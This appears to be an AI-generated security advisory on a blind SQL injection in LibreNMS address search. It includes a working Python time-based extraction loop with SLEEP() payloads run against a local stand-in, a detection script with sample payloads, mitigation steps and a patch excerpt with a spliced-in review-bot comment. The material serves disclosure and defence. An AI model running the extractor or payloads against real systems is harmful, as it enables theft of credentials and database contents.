CVE-2026-26990 Overview
LibreNMS, an auto-discovering PHP/MySQL/SNMP based network monitoring tool, contains a Time-Based Blind SQL Injection vulnerability in address-search.inc.php. Versions 25.12.0 and below are affected by this flaw, which allows authenticated attackers to manipulate SQL query logic and extract sensitive database information through time-based conditional responses. The vulnerability exists because a crafted subnet prefix value supplied via the address parameter is concatenated directly into an SQL query without proper parameter binding.
Critical Impact
Any authenticated user can exploit this injection to infer the contents of the backend database one character at a time, including usernames, password hashes and configuration data, which in turn can expose every monitored device and credential stored in LibreNMS. The direct impact is to confidentiality; the SLEEP() or BENCHMARK() calls used for inference also tie up the database and can degrade availability of the monitoring system while an extraction is running.
Affected Products
- LibreNMS versions 25.12.0 and below (the range listed in the advisory)
- Any deployment not yet upgraded to the fixed release, 26.2.0
- Address search is a standard feature, so every installation in the affected range is exposed to any authenticated user
Discovery Timeline
- 2026-02-20 - CVE-2026-26990 published to NVD
- 2026-02-20 - Last updated in the NVD database
Technical Details for CVE-2026-26990
Vulnerability Analysis
This Time-Based Blind SQL Injection vulnerability (CWE-89) exists in the address search functionality of LibreNMS. The root issue stems from improper handling of user-supplied input in the address-search.inc.php file. When an authenticated user submits a search query with a specially crafted subnet prefix, the application fails to properly sanitize or parameterize this input before incorporating it into a database query.
The vulnerability is classified as authenticated, meaning an attacker must possess valid credentials to exploit it. However, any authenticated user—regardless of privilege level—can leverage this flaw to extract sensitive information from the backend MySQL database through time-based inference attacks.
Root Cause
The vulnerability originates from direct string concatenation of user-supplied input into SQL queries without proper parameter binding. The address parameter in the address search functionality accepts subnet prefix values that are then unsafely incorporated into database queries. This violates secure coding practices that mandate the use of prepared statements or parameterized queries for all user-controlled data.
Attack Vector
The attack is network-accessible and exploitable with low complexity. An authenticated attacker can submit malicious payloads through the address search feature, injecting SQL syntax that includes time-delay functions such as SLEEP() or BENCHMARK(). By measuring response times, the attacker can systematically infer database contents character by character, extracting usernames, password hashes, configuration data, and other sensitive information stored in the LibreNMS database.
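The inference loop described above, as an added example that is not LibreNMS code: a constructed SQLite stand-in for the flawed backend concatenates the prefix after "/" into the query exactly as the advisory describes, while the IP part is bound, and a hardened variant validates and binds both values. The table and column names, the sample rows and the SLEEP() function (registered in Python because SQLite has none; MySQL provides it natively) are all assumptions made for the demonstration.

```python
"""Time-based blind SQL injection through a concatenated subnet prefix.

Added example, not LibreNMS code: the table layout, column names and query are
constructed stand-ins for the flawed pattern described in the advisory (prefix
after '/' concatenated into SQL). SQLite has no SLEEP(), so a Python SLEEP()
function is registered to mimic MySQL's for the demonstration.
"""
import sqlite3
import time

SLEEP_SECONDS = 0.2            # delay requested by the injected payload
THRESHOLD = SLEEP_SECONDS / 2  # a slower-than-this response means "condition true"


def build_db():
    """In-memory database with constructed sample rows (not real LibreNMS data)."""
    conn = sqlite3.connect(":memory:")
    conn.create_function("SLEEP", 1, lambda seconds: time.sleep(seconds) or 0)
    conn.executescript("""
        CREATE TABLE ipv4_addresses (ipv4_address TEXT, ipv4_prefixlen INTEGER);
        INSERT INTO ipv4_addresses VALUES ('10.1.1.1', 24), ('10.2.0.1', 16);
        CREATE TABLE users (user_id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', '$2y$10$constructed-hash-value');
    """)
    return conn


def search_vulnerable(conn, address):
    """Flawed pattern: the IP part is bound, but the prefix is concatenated."""
    ip, prefix = address.split("/", 1)
    sql = ("SELECT ipv4_address FROM ipv4_addresses "
           f"WHERE ipv4_address LIKE ? AND ipv4_prefixlen = {prefix}")
    return [row[0] for row in conn.execute(sql, (ip + "%",))]


def search_fixed(conn, address):
    """Hardened version: validate the prefix as an integer and bind both values."""
    ip, prefix = address.split("/", 1)
    if not prefix.isdigit() or int(prefix) > 128:
        return []
    sql = ("SELECT ipv4_address FROM ipv4_addresses "
           "WHERE ipv4_address LIKE ? AND ipv4_prefixlen = ?")
    return [row[0] for row in conn.execute(sql, (ip + "%", int(prefix)))]


def probe(conn, condition, search=search_vulnerable):
    """Time-based oracle: True if the injected condition made the query sleep."""
    payload = (f"0 OR (SELECT CASE WHEN {condition} "
               f"THEN SLEEP({SLEEP_SECONDS}) ELSE 0 END)")
    start = time.perf_counter()
    search(conn, "10./" + payload)   # the result set is irrelevant; only timing matters
    return time.perf_counter() - start > THRESHOLD


def extract(conn, expr, max_len=32, search=search_vulnerable):
    """Recover the text of a scalar SQL expression one character at a time.

    Length and each character are found by binary search over probe() results,
    the same strategy automated injection tools use against a timing oracle.
    """
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if probe(conn, f"length({expr}) > {mid}", search):
            lo = mid + 1
        else:
            hi = mid
    length = lo

    recovered = []
    for pos in range(1, length + 1):
        lo, hi = 32, 126    # printable ASCII range
        while lo < hi:
            mid = (lo + hi) // 2
            if probe(conn, f"unicode(substr({expr}, {pos}, 1)) > {mid}", search):
                lo = mid + 1
            else:
                hi = mid
        recovered.append(chr(lo))
    return "".join(recovered)


if __name__ == "__main__":
    db = build_db()
    target = "(SELECT username FROM users WHERE user_id = 1)"
    print("vulnerable backend leaks:", extract(db, target))
    print("fixed backend, same payload:", search_fixed(db, "10./0 OR 1=1"))
```

Against search_vulnerable the loop recovers the seeded username without ever seeing a row of output; against search_fixed the same probes never sleep, the length search converges to zero and nothing is recovered, which is the property the parameterized rewrite in 26.2.0 restores.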
// Security patch excerpt from AddressSearchController.php
// Source: https://github.com/librenms/librenms/commit/15429580baba03ed1dd377bada1bde4b7a1175a1
+<?php
+
+/**
+ * SearchController.php
+ *
+ * -Description-
+ *
+ * This program is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program. If not, see <https://www.gnu.org/licenses/>.
+ *
+ * @link https://www.librenms.org
+ *
+ * @copyright 2026 Tony Murray
+ * @author Tony Murray <murraytony@gmail.com>
+ */
+
+namespace App\Http\Controllers\Table;
+
+use App\Models\Port;
+use Illuminate\Contracts\Database\Query\Expression;
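Review bot: the docblock in this new file still reads `* SearchController.php` and keeps the `* -Description-` placeholder, although the file being added is AddressSearchController.php; the header should name the file and carry a one-line description of what the controller serves. Separately, `use Illuminate\Contracts\Database\Query\Expression;` means raw expressions are built somewhere further down in this controller, so the review should confirm that the subnet prefix taken from the request never reaches such an expression unbound, since unbound prefix input is exactly the defect this commit fixes. The excerpt stops at the imports, so the query code itself has to be read in the linked commit.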
The fix involves a complete rewrite of the address search backend to use Laravel's Eloquent ORM with proper parameter binding, eliminating the direct SQL string concatenation vulnerability.
Detection Methods for CVE-2026-26990
Indicators of Compromise
- Response times on the address search endpoint that cluster around a fixed delay (for example a few seconds) rather than the normal sub-second baseline, the signature of SLEEP()-based inference
- Database logs (general or slow query log) showing SLEEP() or BENCHMARK() inside queries issued by the LibreNMS database user; WAITFOR is a SQL Server construct and will not appear against the MySQL/MariaDB backend
- Long runs of sequential address search requests from a single authenticated session, typically hundreds per extracted string, since each request yields one bit of information
- Non-numeric content in the prefix position of the address parameter (the text after "/"); a legitimate prefix length is an integer from 0 to 32 for IPv4 or 0 to 128 for IPv6, so quotes, comments (--), semicolons or OR/AND there are a strong signal
- Unexpected database load or timeout errors correlated with address search requests
Detection Strategies
- Implement Web Application Firewall (WAF) rules to detect SQL injection patterns in HTTP requests
- Monitor database query logs for queries containing time-delay functions or unusual conditional statements
- Configure alerting on abnormal response time distributions for the address search endpoint
- Deploy SentinelOne Singularity XDR to detect anomalous application behavior and potential SQL injection exploitation attempts
- Audit authentication logs for accounts performing excessive address search queries
Monitoring Recommendations
- Log the full request (query string or POST body, authenticated user and response time) for the address search endpoint at the web server or reverse proxy, since the default access log does not record the address parameter when it is sent in a POST body
- Configure real-time alerting for SQL injection signature matches in web server logs
- Monitor database performance metrics for unusual CPU spikes or query execution delays
- Implement user behavior analytics to identify authenticated users exhibiting suspicious search patterns
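The detection and monitoring points above, combined into one added example that is not part of this page or of LibreNMS. It runs over constructed JSON-lines request records of the kind a reverse proxy or WAF can be configured to emit (fields assumed: user, path, address, request_time; request_time corresponds to nginx's $request_time), and applies three checks: a non-numeric prefix, a response far slower than the baseline for clean requests, and request volume per user. The endpoint path is the one used on this page and should be verified against your deployment.

```python
"""Detecting time-based blind SQLi attempts against the address search endpoint.

Added example, not part of this page or of LibreNMS. The record format and
field names are assumptions; the sample records are constructed.
"""
import json
import re
import statistics
from collections import defaultdict

ENDPOINT = "/ajax/table/address-search"   # path as used on this page; verify locally
VALID_PREFIX = re.compile(r"^\d{1,3}$")   # prefix length must be a small integer
SLOW_FACTOR = 5.0      # a response slower than 5x the clean baseline is suspicious
VOLUME_LIMIT = 3       # more endpoint requests than this from one user in the window

# Constructed sample records: alice browses normally, mallory runs an inference loop.
SAMPLE_LOG = """
{"user": "alice",   "path": "/ajax/table/address-search", "address": "10.1.0.0/24", "request_time": 0.021}
{"user": "alice",   "path": "/ajax/table/address-search", "address": "10.2/16", "request_time": 0.019}
{"user": "alice",   "path": "/ajax/table/ports", "address": "", "request_time": 0.030}
{"user": "mallory", "path": "/ajax/table/address-search", "address": "10./0 OR 1=1", "request_time": 0.022}
{"user": "mallory", "path": "/ajax/table/address-search", "address": "10./0 OR SLEEP(1.5)", "request_time": 1.512}
{"user": "mallory", "path": "/ajax/table/address-search", "address": "10./0 OR (SELECT CASE WHEN 1=1 THEN SLEEP(1.5) ELSE 0 END)", "request_time": 1.509}
{"user": "mallory", "path": "/ajax/table/address-search", "address": "10./0 OR (SELECT CASE WHEN 1=0 THEN SLEEP(1.5) ELSE 0 END)", "request_time": 0.023}
"""


def parse_records(text):
    """One JSON object per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def prefix_is_valid(address):
    """True when the text after '/' is a prefix length an address search can use."""
    if "/" not in address:
        return True
    prefix = address.split("/", 1)[1]
    return bool(VALID_PREFIX.match(prefix)) and int(prefix) <= 128


def analyze(records):
    """Return a list of findings, each with the user, the address value and reasons."""
    hits = [r for r in records if r["path"] == ENDPOINT]
    # Baseline from requests that look syntactically clean, so that an attacker's
    # slow probes do not drag the median up and hide themselves.
    clean_times = [r["request_time"] for r in hits if prefix_is_valid(r["address"])]
    baseline = statistics.median(clean_times) if clean_times else 0.05
    findings = []
    per_user = defaultdict(int)
    for r in hits:
        per_user[r["user"]] += 1
        reasons = []
        if not prefix_is_valid(r["address"]):
            reasons.append("non-numeric prefix")
        if r["request_time"] > SLOW_FACTOR * baseline:
            reasons.append("slow response")
        if reasons:
            findings.append({"user": r["user"], "address": r["address"], "reasons": reasons})
    for user, count in per_user.items():
        if count > VOLUME_LIMIT:
            findings.append({"user": user, "address": None,
                             "reasons": [f"{count} address search requests in window"]})
    return findings


def flagged_users(records):
    """Sorted list of users with at least one finding."""
    return sorted({f["user"] for f in analyze(records)})


if __name__ == "__main__":
    for finding in analyze(parse_records(SAMPLE_LOG)):
        print(finding)
```

The prefix check is the cheapest and most precise of the three and belongs in a WAF or proxy rule; the timing and volume checks catch payloads a signature misses (an attacker can encode or reshape the SQL, but cannot avoid the delay that carries the answer, nor the number of requests a character-by-character extraction needs).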
How to Mitigate CVE-2026-26990
Immediate Actions Required
- Upgrade LibreNMS to version 26.2.0 or later immediately
- Review authentication logs to identify potential exploitation attempts
- Audit user accounts with access to address search functionality for suspicious activity
- Apply network segmentation to limit access to LibreNMS management interfaces
- Consider temporarily disabling address search functionality if immediate patching is not possible
Patch Information
The vulnerability is addressed in LibreNMS version 26.2.0, which replaces the concatenating address search backend with a controller built on Laravel's Eloquent ORM and bound query parameters. The fix is the GitHub commit linked above; further details are in GitHub Security Advisory GHSA-79q9-wc6p-cf92 and GitHub Pull Request #18777.
Workarounds
- Restrict network access to LibreNMS to trusted IP addresses only
- Require multi-factor authentication so that stolen credentials alone cannot reach the endpoint (this does not stop a legitimate low-privilege user from exploiting the flaw)
- Deploy a Web Application Firewall with SQL injection detection rules
- Monitor and limit API rate access for authenticated users
# Configuration example - restrict access to the LibreNMS address search endpoint via nginx.
# The path below is the one used on this page; confirm it matches your LibreNMS version
# before relying on it. This is a stopgap that limits who can reach the endpoint,
# not a fix for the injection itself.

# In the http block: define the rate-limiting zone, keyed on the client address.
limit_req_zone $binary_remote_addr zone=librenms_api:10m rate=10r/m;

# In the server block for LibreNMS:
location /ajax/table/address-search {
    # Option A: allow only administrative networks (adjust 10.0.0.0/8 to your range).
    # If nginx sits behind a proxy, $remote_addr is the proxy; configure the real_ip module first.
    allow 10.0.0.0/8;
    deny all;

    # Option B: rate-limit the endpoint to slow down character-by-character extraction.
    limit_req zone=librenms_api burst=5 nodelay;

    # Allowed requests still have to reach the application, so repeat the front-controller
    # rule from the site's root location here.
    try_files $uri $uri/ /index.php?$query_string;
}
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.

